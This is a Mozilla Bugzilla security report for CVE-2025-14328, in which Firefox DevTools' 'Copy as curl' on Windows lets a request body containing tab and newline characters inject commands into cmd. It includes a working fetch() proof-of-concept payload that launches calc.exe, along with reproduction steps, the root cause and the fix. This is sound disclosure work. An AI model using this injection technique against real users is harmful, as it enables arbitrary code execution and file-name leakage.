Closed Bug 1996761 (CVE-2025-14328) Opened 7 months ago Closed 7 months ago

Copy As Curl (Windows) - Code Execution via body \n injection

Categories

(DevTools :: Netmonitor, defect, P2)

Product:
DevTools
Component:
Netmonitor
Platform:
Unspecified
Windows
Type:
defect

Tracking

(firefox-esr115 wontfix, firefox-esr140146+ fixed, firefox145 wontfix, firefox146+ fixed, firefox147+ fixed)

Status:
RESOLVED FIXED
Milestone:
147 Branch
Tracking Flags:
Tracking Status
firefox-esr115 --- wontfix
firefox-esr140 146+ fixed
firefox145 --- wontfix
firefox146 + fixed
firefox147 + fixed

People

(Reporter: ameenbasha111, Assigned: bomsy)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-priv-escalation, reporter-external, sec-moderate, Whiteboard: [client-bounty-form][adv-main146+][adv-esr140.6+])

Attachments

(3 files)

Firefox-CopyAsCurl-Windows-tabcharacter.mp4
2.56 MB, video/mp4
Details
(secure)
48 bytes, text/x-phabricator-request
dmeehan
: approval-mozilla-beta+
Details | Review
(secure)
48 bytes, text/x-phabricator-request
phab-bot
: approval-mozilla-esr140+
Details | Review

Hi Team, Firefox latest on windows is vulnerable for code execution via copy as curl (windows) feature on windows, which allows attacker to execute arbitrary command on victim machine

Payload:

fetch("/", {
"credentials": "omit",
"headers": {
"Accept-Language": "en-US",
"Content-Type": "text/plain",
},
"body": '\t \rcalc.exe "\t  \n',
"method": "POST",
});

Note: It also have impact of sharing LOCAL FILE NAME with attacker by using consecutive tab chaarcters

Steps to reproduce:

  1. Send the above request directly via console (or) embed it in html
  2. Now from network tab copy the request as curl
  3. paste it in cmd and you can find the calc popup

Tested in Nightly 146.0a1 (2025-10-27) (64-bit) on windows 11 pro

I have attached the poc video too for reference

Flags: sec-bounty?

Root cause is when " is used it is escaped with ^ character so " become => ^" and immediate usage of \t include the local file name which will enclose with " and we can free to use \n (or) \r to break to new line and execute Code

  1. Impact: Code Execution
  2. Local File Names Disclosure (Complete Directory file names disclosure to attacker)
Component: Security → Netmonitor
Keywords: csectype-priv-escalation
Product: Firefox → DevTools
Status: UNCONFIRMED → NEW
Ever confirmed: true
OS: Unspecified → Windows
See Also: → CVE-2025-14329
Blocks: curl
Summary: Copy As Curl[Windows] - Code Execution [Latest] → Copy As Curl (Windows) - Code Execution via body \n injection
Severity: -- → S3
Priority: -- → P2
Attached file (secure)
Assignee: nobody → hmanilla
Status: NEW → ASSIGNED
Pushed by hmanilla@mozilla.com: https://github.com/mozilla-firefox/firefox/commit/5c7b1adb9c3f https://hg.mozilla.org/integration/autoland/rev/fc7eb99824bb [devtools] Replace any other whitespace like characters with space r=devtools-reviewers,nchevobbe

https://hg-edge.mozilla.org/mozilla-central/rev/fc7eb99824bb

Group: firefox-core-security → core-security-release
Status: ASSIGNED → RESOLVED
Closed: 7 months ago
status-firefox145: --- → wontfix
status-firefox146: --- → affected
status-firefox147: --- → fixed
status-firefox-esr115: --- → wontfix
status-firefox-esr140: --- → affected
tracking-firefox146: --- → +
tracking-firefox147: --- → +
tracking-firefox-esr140: --- → 146+
Flags: in-testsuite+
Resolution: --- → FIXED
Target Milestone: --- → 147 Branch

The patch landed in nightly and beta is affected.
:bomsy, is this bug important enough to require an uplift?

For more information, please visit BugBot documentation.

Flags: needinfo?(hmanilla)

:bomsy, to add to Comment 5, this will also need an uplift request for ESR140. It grafts cleanly with Bug 1997018 applied.

Flags: sec-bounty? → sec-bounty+

firefox-esr140 Uplift Approval Request

  • User impact if declined: With clever combinations which would include certain whitespace-like characters in the curl commands apps on user local machine can be executed.
  • Code covered by automated testing: yes
  • Fix verified in Nightly: yes
  • Needs manual QE test: no
  • Steps to reproduce for manual QE testing:
  • Risk associated with taking this patch: low
  • Explanation of risk level: Small js patch with regexp to escape the whitespace-like characters.
  • String changes made/needed: None
  • Is Android affected?: no
Attachment #9529372 - Flags: approval-mozilla-esr140?
Attached file (secure)

Certain control characters (e.g tab or form feed) are whitespace like characters.
This replaces those with a simple space.

Original Revision: https://phabricator.services.mozilla.com/D272425

Flags: needinfo?(hmanilla)

Comment on attachment 9526438 [details]
(secure)

Beta/Release Uplift Approval Request

  • User impact if declined/Reason for urgency: With clever combinations which would include certain whitespace-like characters in the curl commands apps on user local machine can be executed.
  • Is this code covered by automated tests?: Yes
  • Has the fix been verified in Nightly?: Yes
  • Needs manual test from QE?: No
  • If yes, steps to reproduce:
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Small js patch with regexp to escape the whitespace-like characters.
  • String changes made/needed: None
  • Is Android affected?: No
Attachment #9526438 - Flags: approval-mozilla-beta?
Attachment #9529372 - Flags: approval-mozilla-beta?
Attachment #9529372 - Flags: approval-mozilla-beta?

Comment on attachment 9526438 [details]
(secure)

Approved for 146.0b9

Attachment #9526438 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Attachment #9529372 - Flags: approval-mozilla-esr140? → approval-mozilla-esr140+
QA Whiteboard: [sec] [uplift] [qa-triage-done-c147/b146]
Whiteboard: [client-bounty-form] → [client-bounty-form][adv-main146+]
Whiteboard: [client-bounty-form][adv-main146+] → [client-bounty-form][adv-main146+][adv-esr140.6+]
Alias: CVE-2025-14328
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: